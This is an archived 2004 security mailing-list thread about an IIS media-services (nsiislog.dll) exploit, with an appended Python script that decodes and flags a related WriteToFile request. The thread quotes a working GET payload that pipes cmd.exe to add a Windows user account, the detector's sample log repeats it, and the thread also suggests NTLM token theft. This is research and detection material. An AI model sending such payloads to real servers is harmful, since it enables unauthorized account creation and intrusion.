Dailydave mailing list archives
Re: New mediaservices sploit
From: Dave Aitel <dave () immunitysec com>
Date: Sat, 13 Mar 2004 14:22:53 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:
| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since it's in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it to be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?

Well, the POST bug was a heap overflow, and this bug is a stack
overflow, so I dunno. It works on my version of nsiislog.dll, which is
fairly old. It's been a while since I wrote it, so I don't remember
exactly what happened with the patch situation.

|
| Brett actually found three bugs in this ISAPI; the original chunked
| encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.

|
| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc.
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET
| /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%
| 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
| 20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD

You can't write a .asp file into the scripts directory? Or a .dll? I
assume not. You're running as SYSTEM? Why not write to \\myserver\\ and
steal the token and relogin through NTLM auth?

- -dave

|
| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|> accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>
|> _______________________________________________
|> Dailydave mailing list
|> Dailydave () lists immunitysec com
|> http://www.immunitysec.com/mailman/listinfo/dailydave
|
| _______________________________________________
| Dailydave mailing list
| Dailydave () lists immunitysec com
| http://www.immunitysec.com/mailman/listinfo/dailydave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR
q3eaEdpJZeuG97kHz07TkOU=
=E4yX
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
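The request H D Moore quotes above is hard to read as posted, since the file body is URL-encoded and wrapped across mail lines. The following is an added example, not code from the thread or from any product it discusses: a small Python helper that takes a request line of that shape, recovers the `obj=httpd:WriteToFile(...)` call, splits it into the target path and the decoded config body, and flags the piece a reviewer or an IDS rule would care about, a directive whose value starts with `|` and so hands log output to a command. It makes no claim about which product accepts the request or whether the write leads to execution (the thread leaves that open); it only decodes what is on the page. The request line is the one from the post, joined across the wrapping; the other two log lines are constructed for the example, and `parse_write_to_file`, `findings` and `scan_log` are names chosen here.

```python
# Added example (not from the thread): decode an httpd:WriteToFile request
# of the shape H D Moore posted and flag the pipe-to-command directive.
import re
from urllib.parse import parse_qs, urlsplit

# The request from the post, joined across the mail wrapping. Note there is
# no closing paren after the file body; that is how it was posted.
POSTED_REQUEST = (
    "GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile("
    "[$__installdir$]conf/portlisten.conf,Listen%208000%0A%0D"
    'AccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20'
    'net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0'
)

# Constructed sample log: the posted request plus two lines that must not fire.
SAMPLE_LOG = [
    POSTED_REQUEST,
    "GET /plugins/framework/script/tree.xms?obj=httpd:GetStatus() HTTP/1.0",
    "GET /index.html HTTP/1.0",
]

# namespace:function(args...   -- args run to end of string (DOTALL).
CALL_RE = re.compile(r"^(?P<ns>\w+):(?P<fn>\w+)\((?P<args>.*)$", re.S)
# A directive value of the form "|command" (quotes optional).
PIPE_RE = re.compile(r'^"?\|(?P<cmd>.*?)"?$')


def parse_write_to_file(request_line):
    """Return {'path', 'content', 'directives'} for an httpd:WriteToFile
    request line, or None if the line is not one. 'directives' is the
    decoded file body as (name, value) pairs, one per config line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    # parse_qs URL-decodes the value, turning %20/%0A/%0D into real chars.
    obj = parse_qs(query, keep_blank_values=True).get("obj", [None])[0]
    if obj is None:
        return None
    m = CALL_RE.match(obj)
    if not m or (m.group("ns"), m.group("fn")) != ("httpd", "WriteToFile"):
        return None
    # First argument is the target path; everything after the first comma
    # is the file body.
    path, _, content = m.group("args").partition(",")
    directives = []
    for line in re.split(r"[\r\n]+", content):
        if line.strip():
            name, _, value = line.strip().partition(" ")
            directives.append((name, value.strip()))
    return {"path": path, "content": content, "directives": directives}


def findings(request_line):
    """List the reasons a request should be flagged (empty if none)."""
    info = parse_write_to_file(request_line)
    if info is None:
        return []
    out = [f"httpd:WriteToFile writes to {info['path']}"]
    for name, value in info["directives"]:
        m = PIPE_RE.match(value)
        if m:
            cmd = m.group("cmd")
            out.append(f"{name} pipes log output into a command: {cmd}")
            if "../" in cmd or "..\\" in cmd:
                out.append(f"{name} command uses path traversal")
    return out


def scan_log(lines):
    """Return [(line_number, findings)] for every line that fires."""
    hits = []
    for n, line in enumerate(lines, 1):
        f = findings(line)
        if f:
            hits.append((n, f))
    return hits


if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(f"line {n}:")
        for item in f:
            print("  -", item)
```

Run stand-alone it reports only the first sample line, with the target path `[$__installdir$]conf/portlisten.conf`, the decoded `Listen 8000` directive, and the `AccessLog` value that pipes into `cmd.exe /c net user P P /ADD` through a `../` chain. The decoded body is what makes the "feature" interesting to a defender: the request is a plain GET with no traversal in the URL path itself, so a rule that only inspects the path misses it, and a rule has to look at the decoded `obj` argument.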
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)